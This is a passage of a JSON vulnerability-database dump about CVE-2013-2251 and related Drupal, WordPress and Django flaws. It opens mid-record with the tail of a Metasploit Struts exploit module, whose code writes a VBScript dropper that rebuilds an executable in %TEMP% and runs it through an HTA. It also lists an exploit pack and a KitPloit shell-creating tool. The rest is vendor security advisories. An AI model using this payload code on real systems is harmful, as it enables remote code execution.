#{var_origLoc}, s, #{var_byteArray}\n#{var_origLoc} = SetLocale(1033)\n|)\n # Drop the exe payload into an ansi string (ansi ensured via SetLocale above)\n # for conversion with ADODB.Stream\n vbs_ary = []\n # The output of this loop needs to be as small as possible since it\n # gets repeated for every byte of the executable, ballooning it by a\n # factor of about 80k (the current size of the exe template). In its\n # current form, it's down to about 4MB on the wire\n @exe.each_byte do |b|\n vbs_ary << Rex::Text.to_hex(\"s=s&Chr(#{(\"%d\" % b)})\\n\")\n end\n vbs_content << vbs_ary.join(\"\")\n\n # Continue with the rest of the vbs file;\n # Use ADODB.Stream to convert from an ansi string to it's byteArray equivalent\n # Then use ADODB.Stream again to write the binary to file.\n #print_status(\"Finishing vbs...\");\n vbs_content << Rex::Text.to_hex(%Q|\nDim #{var_strmConv}, #{var_writedir}, #{var_writestream}\n#{var_writedir} = WScript.CreateObject(\"WScript.Shell\").ExpandEnvironmentStrings(\"%TEMP%\") & \"\\\\#{@var_exename}\"\n\nSet #{var_strmConv} = CreateObject(\"ADODB.Stream\")\n\n#{var_strmConv}.Type = 2\n#{var_strmConv}.Charset = \"x-ansi\"\n#{var_strmConv}.Open\n#{var_strmConv}.WriteText s, 0\n#{var_strmConv}.Position = 0\n#{var_strmConv}.Type = 1\n#{var_strmConv}.SaveToFile #{var_writedir}, 2\n\nSetLocale(#{var_origLoc})|)\n\n hta = <<-EOS\n <script>\n var #{var_shellobj} = new ActiveXObject(\"WScript.Shell\");\n var #{var_fsobj} = new ActiveXObject(\"Scripting.FileSystemObject\");\n var #{var_writedir} = #{var_shellobj}.ExpandEnvironmentStrings(\"%TEMP%\");\n var #{var_fsobj_file} = #{var_fsobj}.OpenTextFile(#{var_writedir} + \"\\\\\\\\\" + \"#{var_vbsname}.vbs\",2,true);\n\n #{var_fsobj_file}.Write(unescape(\"#{vbs_content}\"));\n #{var_fsobj_file}.Close();\n\n #{var_shellobj}.run(\"wscript.exe \" + #{var_writedir} + \"\\\\\\\\\" + \"#{var_vbsname}.vbs\", 1, true);\n #{var_shellobj}.run(#{var_writedir} + \"\\\\\\\\\" + \"#{@var_exename}\", 0, false);\n #{var_fsobj}.DeleteFile(#{var_writedir} + \"\\\\\\\\\" + \"#{var_vbsname}.vbs\");\n window.close();\n </script>\n EOS\n\n return hta\n end\n\n\nend\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/struts_default_action_mapper.rb"}], "jvn": [{"lastseen": "2018-08-31T00:36:20", "references": [], "description": "\n ## Description\n\nApache Struts provided by the Apache Software Foundation is a software framework for creating Java web applications. Apache Struts contains a remote command execution vulnerability. \n \nThis issue is the same issue that the developer published as [S2-016](<http://struts.apache.org/release/2.3.x/docs/s2-016.html>) on July 16, 2013 \n \nNote that attacks leveraging this vulnerability have been confirmed. \n\n\n ## Impact\n\nAn arbitrary command may be executed on the server where Apache Struts resides.\n\n ## Solution\n\n**Apply an Update** \nUpdate to the latest version according to the information provided by the developer. \n\n\n ## Products Affected\n\n * Apache Struts 2.0.0 through 2.3.15 \n\n", "edition": 3, "reporter": "Japan Vulnerability Notes", "published": "2013-09-06T00:00:00", "title": "JVN#33504150: Apache Struts vulnerable to remote command execution", "type": "jvn", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "info", "cvelist": ["CVE-2013-2251"], "modified": "2013-09-06T00:00:00", "id": "JVN:33504150", "href": "http://jvn.jp/en/jp/JVN33504150/index.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "d2": [{"lastseen": "2016-09-25T14:10:43", "references": [], "description": "**Name**| d2sec_struts4 \n---|--- \n**CVE**| CVE-2013-2251 \n**Exploit Pack**| [D2ExploitPack](<http://http://www.d2sec.com/products.htm>) \n**Description**| d2sec_struts4 \n**Notes**| \n", "edition": 1, "reporter": "DSquare", "published": "2013-07-19T23:37:30", "title": "DSquare Exploit Pack: D2SEC_STRUTS4", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "d2", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2251"], "modified": "2013-07-19T23:37:30", "id": "D2SEC_STRUTS4", "href": "http://exploitlist.immunityinc.com/home/exploitpack/D2ExploitPack/d2sec_struts4", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "debian": [{"lastseen": "2016-09-02T18:30:45", "references": [], "affectedPackage": [{"OS": "Debian GNU/Linux", "OSVersion": "6", "packageVersion": "6.31-1", "packageFilename": "drupal6_6.31-1_all.deb", "packageName": "drupal6", "arch": "all", "operator": "lt"}], "description": "An information disclosure vulnerability was discovered in Drupal, a fully-featured content management framework. When pages are cached for anonymous users, form state may leak between anonymous users. Sensitive or private information recorded for one anonymous user could thus be disclosed to other users interacting with the same form at the same time.\n\nThis security update introduces small API changes, see the upstream advisory at [drupal.org/SA-CORE-2014-002](<https://drupal.org/SA-CORE-2014-002>) for further information.\n\nFor the oldstable distribution (squeeze), this problem has been fixed in version 6.31-1.\n\nWe recommend that you upgrade your drupal6 packages.", "edition": 1, "reporter": "Debian", "published": "2014-04-25T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "drupal6 -- security update", "type": "debian", "bulletinFamily": "unix", "cvelist": ["CVE-2014-2983"], "modified": "2014-04-25T00:00:00", "id": "DSA-2914", "href": "http://www.debian.org/security/dsa-2914", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2016-09-02T18:28:18", "references": [], "affectedPackage": [{"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "7.14-2+deb7u4", "packageFilename": "drupal7_7.14-2+deb7u4_all.deb", "packageName": "drupal7", "arch": "all", "operator": "lt"}], "description": "An information disclosure vulnerability was discovered in Drupal, a fully-featured content management framework. When pages are cached for anonymous users, form state may leak between anonymous users. Sensitive or private information recorded for one anonymous user could thus be disclosed to other users interacting with the same form at the same time.\n\nThis security update introduces small API changes, see the upstream advisory at [drupal.org/SA-CORE-2014-002](<https://drupal.org/SA-CORE-2014-002>) for further information.\n\nFor the stable distribution (wheezy), this problem has been fixed in version 7.14-2+deb7u4.\n\nFor the testing distribution (jessie), this problem has been fixed in version 7.27-1.\n\nFor the unstable distribution (sid), this problem has been fixed in version 7.27-1.\n\nWe recommend that you upgrade your drupal7 packages.", "edition": 1, "reporter": "Debian", "published": "2014-04-25T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "debian", "title": "drupal7 -- security update", "bulletinFamily": "unix", "cvelist": ["CVE-2014-2983"], "modified": "2014-04-25T00:00:00", "id": "DSA-2913", "href": "http://www.debian.org/security/dsa-2913", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2016-09-02T18:24:32", "references": [], "affectedPackage": [{"OS": "Debian GNU/Linux", "OSVersion": "6", "packageVersion": "3.6.1+dfsg-1~deb6u2", "packageFilename": "wordpress_3.6.1+dfsg-1~deb6u2_all.deb", "packageName": "wordpress", "arch": "all", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.6.1+dfsg-1~deb7u2", "packageFilename": "wordpress_3.6.1+dfsg-1~deb7u2_all.deb", "packageName": "wordpress", "arch": "all", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "3.6.1+dfsg-1~deb7u2", "packageFilename": "wordpress-l10n_3.6.1+dfsg-1~deb7u2_all.deb", "packageName": "wordpress-l10n", "arch": "all", "operator": "lt"}], "description": "Several vulnerabilities were discovered in Wordpress, a web blogging tool. The Common Vulnerabilities and Exposures project identifies the following problems:\n\n * [CVE-2014-0165](<https://security-tracker.debian.org/tracker/CVE-2014-0165>)\n\nA user with a contributor role, using a specially crafted request, can publish posts, which is reserved for users of the next-higher role.\n\n * [CVE-2014-0166](<https://security-tracker.debian.org/tracker/CVE-2014-0166>)\n\nJon Cave of the WordPress security team discovered that the wp_validate_auth_cookie function in wp-includes/pluggable.php does not properly determine the validity of authentication cookies, allowing a remote attacker to obtain access via a forged cookie.\n\nFor the oldstable distribution (squeeze), these problems have been fixed in version 3.6.1+dfsg-1~deb6u2.\n\nFor the stable distribution (wheezy), these problems have been fixed in version 3.6.1+dfsg-1~deb7u2.\n\nFor the testing distribution (jessie), these problems have been fixed in version 3.8.2+dfsg-1.\n\nFor the unstable distribution (sid), these problems have been fixed in version 3.8.2+dfsg-1.\n\nWe recommend that you upgrade your wordpress packages.", "edition": 1, "reporter": "Debian", "published": "2014-04-12T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "debian", "title": "wordpress -- security update", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0166", "CVE-2014-0165"], "modified": "2014-04-12T00:00:00", "id": "DSA-2901", "href": "http://www.debian.org/security/dsa-2901", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}, {"lastseen": "2016-09-02T18:24:45", "references": [], "affectedPackage": [{"OS": "Debian GNU/Linux", "OSVersion": "6", "packageVersion": "1.2.3-3+squeeze10", "packageFilename": "python-django_1.2.3-3+squeeze10_all.deb", "arch": "all", "packageName": "python-django", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "1.4.5-1+deb7u7", "packageFilename": "python-django-doc_1.4.5-1+deb7u7_all.deb", "arch": "all", "packageName": "python-django-doc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "1.4.5-1+deb7u7", "packageFilename": "python-django_1.4.5-1+deb7u7_all.deb", "arch": "all", "packageName": "python-django", "operator": "lt"}], "edition": 1, "description": "Several vulnerabilities were discovered in Django, a high-level Python web development framework. The Common Vulnerabilities and Exposures project identifies the following problems:\n\n * [CVE-2014-0472](<https://security-tracker.debian.org/tracker/CVE-2014-0472>)\n\nBenjamin Bach discovered that Django incorrectly handled dotted Python paths when using the reverse() URL resolver function. An attacker able to request a specially crafted view from a Django application could use this issue to cause Django to import arbitrary modules from the Python path, resulting in possible code execution.\n\n * [CVE-2014-0473](<https://security-tracker.debian.org/tracker/CVE-2014-0473>)\n\nPaul McMillan discovered that Django incorrectly cached certain pages that contained CSRF cookies. A remote attacker could use this flaw to acquire the CSRF token of a different user and bypass intended CSRF protections in a Django application.\n\n * [CVE-2014-0474](<https://security-tracker.debian.org/tracker/CVE-2014-0474>)\n\nMichael Koziarski discovered that certain Django model field classes did not properly perform type conversion on their arguments, which allows remote attackers to obtain unexpected results.\n\n * [CVE-2014-1418](<https://security-tracker.debian.org/tracker/CVE-2014-1418>)\n\nMichael Nelson, Natalia Bidart and James Westby discovered that cached data in Django could be served to a different session, or to a user with no session at all. An attacker may use this to retrieve private data or poison caches.\n\n * [CVE-2014-3730](<https://security-tracker.debian.org/tracker/CVE-2014-3730>)\n\nPeter Kuma and Gavin Wahl discovered that Django incorrectly validated certain malformed URLs from user input. An attacker may use this to cause unexpected redirects.\n\nFor the oldstable distribution (squeeze), these problems have been fixed in version 1.2.3-3+squeeze10.\n\nFor the stable distribution (wheezy), these problems have been fixed in version 1.4.5-1+deb7u7.\n\nFor the testing distribution (jessie), these problems have been fixed in version 1.6.5-1.\n\nFor the unstable distribution (sid), these problems have been fixed in version 1.6.5-1.\n\nWe recommend that you upgrade your python-django packages.", "reporter": "Debian", "published": "2014-05-19T00:00:00", "type": "debian", "title": "python-django -- security update", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-0474", "CVE-2014-0473", "CVE-2014-1418", "CVE-2014-3730", "CVE-2014-0472"], "modified": "2014-05-19T00:00:00", "id": "DSA-2934", "href": "http://www.debian.org/security/dsa-2934", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "drupal": [{"lastseen": "2018-06-14T20:05:42", "_object_types": ["robots.models.drupal.DrupalBulletin", "robots.models.base.Bulletin"], "references": ["https://drupal.org/drupal-6.31-release-notes", "http://drupal.org/project/drupal", "http://drupal.org/security-team/risk-levels", "http://drupal.org/user/49851", "http://drupal.org/drupal-6.31-release-notes", "https://drupal.org/user/63999", "https://drupal.org/user/865256", "http://drupal.org/writing-secure-code", "https://drupal.org/drupal-7.27-release-notes", "http://drupal.org/user/102818", "https://drupal.org/user/49344", "http://drupal.org/user/124982", "https://drupal.org/user/54136", "http://drupal.org/drupal-7.27-release-notes", "https://drupal.org/user/78040", "https://drupal.org/user/22211", "http://drupal.org/security-team", "http://drupal.org/security/secure-configuration", "https://drupal.org/user/234004", "https://twitter.com/drupalsecurity", "http://drupal.org/contact"], "description": "Drupal's form API has built-in support for temporary storage of form state, for example user input. This is often used on multi-step forms, and is required on Ajax-enabled forms in order to allow the Ajax calls to access and update interim user input on the server.\n\nWhen pages are cached for anonymous users (either by Drupal or by an external system), form state may leak between anonymous users. As a consequence there is a chance that interim form input recorded for one anonymous user (which may include sensitive or private information, depending on the nature of the form) will be disclosed to other users interacting with the same form at the same time. This especially affects multi-step Ajax forms because the window of opportunity (i.e. the time span between user input and final form submission) is indeterminable.\n\nThis vulnerability is mitigated by the fact that Drupal core does not expose any such forms to anonymous users by default. However, contributed modules or individual sites which leverage the Drupal Form API under the aforementioned conditions might be vulnerable.\n\n**Note:** This security release introduces small API changes which may require code updates on sites that expose Ajax or multi-step forms to anonymous users, and where the forms are displayed on pages that are cached (either by Drupal or by an external system). See the [Drupal 6.31 release notes](<http://drupal.org/drupal-6.31-release-notes>) and [Drupal 7.27 release notes](<http://drupal.org/drupal-7.27-release-notes>) for more information.\n\n## CVE identifier(s) issued\n\n * CVE-2014-2983\n\n## Versions affected\n\n * Drupal core 6.x versions prior to 6.31.\n * Drupal core 7.x versions prior to 7.27.\n\n## Solution\n\nInstall the latest version:\n\n * If you use Drupal 6.x, upgrade to [Drupal 6.31](<https://drupal.org/drupal-6.31-release-notes>)\n * If you use Drupal 7.x, upgrade to [Drupal 7.27](<https://drupal.org/drupal-7.27-release-notes>)\n\nAlso see the [Drupal core](<http://drupal.org/project/drupal>) project page.\n\n## Reported by\n\n * [Daniel F. Kudwien](<https://drupal.org/user/54136>)\n * [Rodionov Igor](<https://drupal.org/user/234004>)\n * [Ryan Szrama](<https://drupal.org/user/49344>)\n * [Roman Zimmermann](<https://drupal.org/user/865256>)\n * [znerol](<https://drupal.org/user/63999>)\n\n## Fixed by\n\n * [znerol](<https://drupal.org/user/63999>)\n * [Roman Zimmermann](<https://drupal.org/user/865256>)\n * [Ryan Szrama](<https://drupal.org/user/49344>)\n * Additional assistance and reviews provided by [Daniel F. Kudwien](<https://drupal.org/user/54136>), [Damien Tournoud](<https://drupal.org/user/22211>) of the Drupal Security Team, [David Rothstein](<http://drupal.org/user/124982>) of the Drupal Security Team, and [Alex Bronstein](<https://drupal.org/user/78040>)\n\n## Coordinated by\n\n * [Michael Hess](<http://drupal.org/user/102818>) of the Drupal Security Team\n * [David Rothstein](<http://drupal.org/user/124982>) of the Drupal Security Team\n * [Peter Wolanin](<http://drupal.org/user/49851>) of the Drupal Security Team\n", "reporter": "Drupal Security Team", "published": "2014-04-16T00:00:00", "type": "drupal", "title": "SA-CORE-2014-002 - Drupal core - Information Disclosure\n", "enchantments": {"score": {"modified": "2018-06-14T20:05:42", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "Drupal", "version": "6.31", "operator": "lt"}, {"name": "Drupal", "version": "7.27", "operator": "lt"}], "cvelist": ["CVE-2014-2983"], "_object_type": "robots.models.drupal.DrupalBulletin", "modified": "2014-04-16T00:00:00", "id": "DRUPAL-SA-CORE-2014-002", "href": "https://www.drupal.org/forum/newsletters/security-advisories-for-drupal-core/2014-04-16/sa-core-2014-002-drupal-core", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "kitploit": [{"lastseen": "2018-08-31T14:37:56", "references": ["https://github.com/s1kr10s/Apache-Struts-v3"], "description": " \n\n\n[  ](<https://3.bp.blogspot.com/-MKbYVQXvBz0/W4LReq3_cJI/AAAAAAAAMQ0/WgNhU5_o5cIwFs69p3T2YIf3xObo_rAtgCLcBGAs/s1600/Apache-Struts-v3_1_screen.png>)\n\n \nScript contains the fusion of 3 RCE vulnerabilities on ApacheStruts, it also has the ability to create server shells. \n \n** SHELL ** \n** php ** ` finished ` \n** jsp ** ` process ` \n \n** CVE ADD ** \n** CVE-2013-2251 ** ` 'action:', 'redirect:' and 'redirectAction' ` \n** CVE-2017-5638 ** ` Content-Type ` \n** CVE-2018-11776 ** ` 'redirect:' and 'redirectAction' ` \n \n \n\n\n** [ Download Apache-Struts-v3 ](<https://github.com/s1kr10s/Apache-Struts-v3>) **\n", "edition": 1, "reporter": "KitPloit", "published": "2018-08-26T21:14:01", "title": "Apache Struts v3 - Tool To Exploit 3 RCE Vulnerabilities On ApacheStruts", "type": "kitploit", "enchantments": {"score": {"modified": "2018-08-31T14:37:56", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "tools", "cvelist": ["CVE-2013-2251", "CVE-2017-5638", "CVE-2018-11776"], "modified": "2018-08-26T21:14:01", "toolHref": "https://github.com/s1kr10s/Apache-Struts-v3", "id": "KITPLOIT:4611207874033525364", "href": "http://www.kitploit.com/2018/08/apache-struts-v3-tool-to-exploit-3-rce.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ubuntu": [{"lastseen": "2018-08-31T00:09:53", "references": ["https://usn.ubuntu.com/usn/usn-2169-1", "https://launchpad.net/bugs/1311433"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "14.04", "packageVersion": "1.6.1-2ubuntu0.2", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "python-django", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "1.3.1-4ubuntu1.10", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "python-django", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "13.10", "packageVersion": "1.5.4-1ubuntu1.2", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "python-django", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.10", "packageVersion": "1.4.1-2ubuntu0.6", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "python-django", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "1.1.1-2ubuntu1.11", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "python-django", "operator": "lt"}], "description": "USN-2169-1 fixed vulnerabilities in Django. The upstream security patch for CVE-2014-0472 introduced a regression for certain applications. This update fixes the problem.\n\nOriginal advisory details:\n\nBenjamin Bach discovered that Django incorrectly handled dotted Python paths when using the reverse() function. An attacker could use this issue to cause Django to import arbitrary modules from the Python path, resulting in possible code execution. (CVE-2014-0472)\n\nPaul McMillan discovered that Django incorrectly cached certain pages that contained CSRF cookies. An attacker could possibly use this flaw to obtain a valid cookie and perform attacks which bypass the CSRF restrictions. (CVE-2014-0473)\n\nMichael Koziarski discovered that Django did not always perform explicit conversion of certain fields when using a MySQL database. An attacker could possibly use this issue to obtain unexpected results. (CVE-2014-0474)", "edition": 3, "reporter": "Ubuntu", "published": "2014-04-23T00:00:00", "title": "Django regression", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-0474", "CVE-2014-0473", "CVE-2014-0472"], "modified": "2014-04-23T00:00:00", "id": "USN-2169-2", "href": "https://usn.ubuntu.com/2169-2/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:09:17", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2014-0472", "https://people.canonical.com/~ubuntu-security/cve/CVE-2014-0474", "https://people.canonical.com/~ubuntu-security/cve/CVE-2014-0473"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "13.10", "packageVersion": "1.5.4-1ubuntu1.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "python-django", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.10", "packageVersion": "1.4.1-2ubuntu0.5", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "python-django", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "14.04", "packageVersion": "1.6.1-2ubuntu0.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "python-django", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "1.1.1-2ubuntu1.10", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "python-django", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "1.3.1-4ubuntu1.9", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "python-django", "operator": "lt"}], "description": "Benjamin Bach discovered that Django incorrectly handled dotted Python paths when using the reverse() function. An attacker could use this issue to cause Django to import arbitrary modules from the Python path, resulting in possible code execution. (CVE-2014-0472)\n\nPaul McMillan discovered that Django incorrectly cached certain pages that contained CSRF cookies. An attacker could possibly use this flaw to obtain a valid cookie and perform attacks which bypass the CSRF restrictions. (CVE-2014-0473)\n\nMichael Koziarski discovered that Django did not always perform explicit conversion of certain fields when using a MySQL database. An attacker could possibly use this issue to obtain unexpected results. (CVE-2014-0474)", "edition": 3, "reporter": "Ubuntu", "published": "2014-04-22T00:00:00", "title": "Django vulnerabilities", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-0474", "CVE-2014-0473", "CVE-2014-0472"], "modified": "2014-04-22T00:00:00", "id": "USN-2169-1", "href": "https://usn.ubuntu.com/2169-1/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2018-06-09T10:35:20", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.4.11-1.el6ost", "arch": "noarch", "packageName": "Django14-doc", "packageFilename": "Django14-doc-1.4.11-1.el6ost.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.4.11-1.el6ost", "arch": "noarch", "packageName": "Django14", "packageFilename": "Django14-1.4.11-1.el6ost.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.4.11-1.el6ost", "arch": "src", "packageName": "Django14", "packageFilename": "Django14-1.4.11-1.el6ost.src.rpm", "operator": "lt"}], "description": "The Django web framework is used by horizon, the OpenStack Dashboard, which\nis a web interface for managing OpenStack services.\n\nA flaw was found in the way Django's reverse() URL resolver function\nconstructed certain URLs. A remote attacker able to request a specially\ncrafted view from a Django application could use this flaw to import and\nexecute arbitrary Python modules on the system under the privileges of the\nuser running the application. (CVE-2014-0472)\n\nIt was found that Django's caching framework reused Cross-Site Request\nForgery (CSRF) nonces for all requests from unauthenticated clients.\nA remote attacker could use this flaw to acquire the CSRF token of a\ndifferent user and bypass intended CSRF protections in a Django\napplication. (CVE-2014-0473)\n\nIt was discovered that certain Django model field classes did not properly\nperform type conversion on their arguments. A remote attacker could use\nthis flaw to submit a specially crafted SQL query that, when processed by a\nDjango application using a MySQL database, could have various\napplication-specific impacts on the MySQL database. (CVE-2014-0474)\n\nRed Hat would like to thank the upstream Django project for reporting this\nissue. Upstream acknowledges Benjamin Bach as the original reporter of\nCVE-2014-0472, Paul McMillan as the original reporter of CVE-2014-0473, and\nthe Ruby on Rails team, and specifically Michael Koziarski, as the original\nreporters of CVE-2014-0474.\n\nAll users of OpenStack Dashboard are advised to upgrade to these updated\npackages, which resolve these issues. After installing the updated\npackages, the httpd daemon must be restarted (\"service httpd restart\") for\nthe update to take effect.\n", "reporter": "RedHat", "published": "2014-04-30T04:00:00", "type": "redhat", "title": "(RHSA-2014:0457) Moderate: Django security update", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-0472", "CVE-2014-0473", "CVE-2014-0474"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-06-09T14:17:32", "id": "RHSA-2014:0457", "href": "https://access.redhat.com/errata/RHSA-2014:0457", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-06-06T23:50:43", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.4.11-1.el6ost", "arch": "noarch", "packageName": "Django14-doc", "packageFilename": "Django14-doc-1.4.11-1.el6ost.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.4.11-1.el6ost", "arch": "noarch", "packageName": "Django14", "packageFilename": "Django14-1.4.11-1.el6ost.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.4.11-1.el6ost", "arch": "src", "packageName": "Django14", "packageFilename": "Django14-1.4.11-1.el6ost.src.rpm", "operator": "lt"}], "description": "The Django web framework is used by horizon, the OpenStack Dashboard, which\nis a web interface for managing OpenStack services.\n\nA flaw was found in the way Django's reverse() URL resolver function\nconstructed certain URLs. A remote attacker able to request a specially\ncrafted view from a Django application could use this flaw to import and\nexecute arbitrary Python modules on the system under the privileges of the\nuser running the application. (CVE-2014-0472)\n\nIt was found that Django's caching framework reused Cross-Site Request\nForgery (CSRF) nonces for all requests from unauthenticated clients.\nA remote attacker could use this flaw to acquire the CSRF token of a\ndifferent user and bypass intended CSRF protections in a Django\napplication. (CVE-2014-0473)\n\nIt was discovered that certain Django model field classes did not properly\nperform type conversion on their arguments. A remote attacker could use\nthis flaw to submit a specially crafted SQL query that, when processed by a\nDjango application using a MySQL database, could have various\napplication-specific impacts on the MySQL database. (CVE-2014-0474)\n\nRed Hat would like to thank the upstream Django project for reporting this\nissue. Upstream acknowledges Benjamin Bach as the original reporter of\nCVE-2014-0472, Paul McMillan as the original reporter of CVE-2014-0473, and\nthe Ruby on Rails team, and specifically Michael Koziarski, as the original\nreporters of CVE-2014-0474.\n\nAll users of OpenStack Dashboard are advised to upgrade to these updated\npackages, which resolve these issues. After installing the updated\npackages, the httpd daemon must be restarted (\"service httpd restart\") for\nthe update to take effect.\n", "reporter": "RedHat", "published": "2014-04-30T04:00:00", "type": "redhat", "title": "(RHSA-2014:0456) Moderate: Django security update", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-0472", "CVE-2014-0473", "CVE-2014-0474"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-06-07T02:47:48", "id": "RHSA-2014:0456", "href": "https://access.redhat.com/errata/RHSA-2014:0456", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
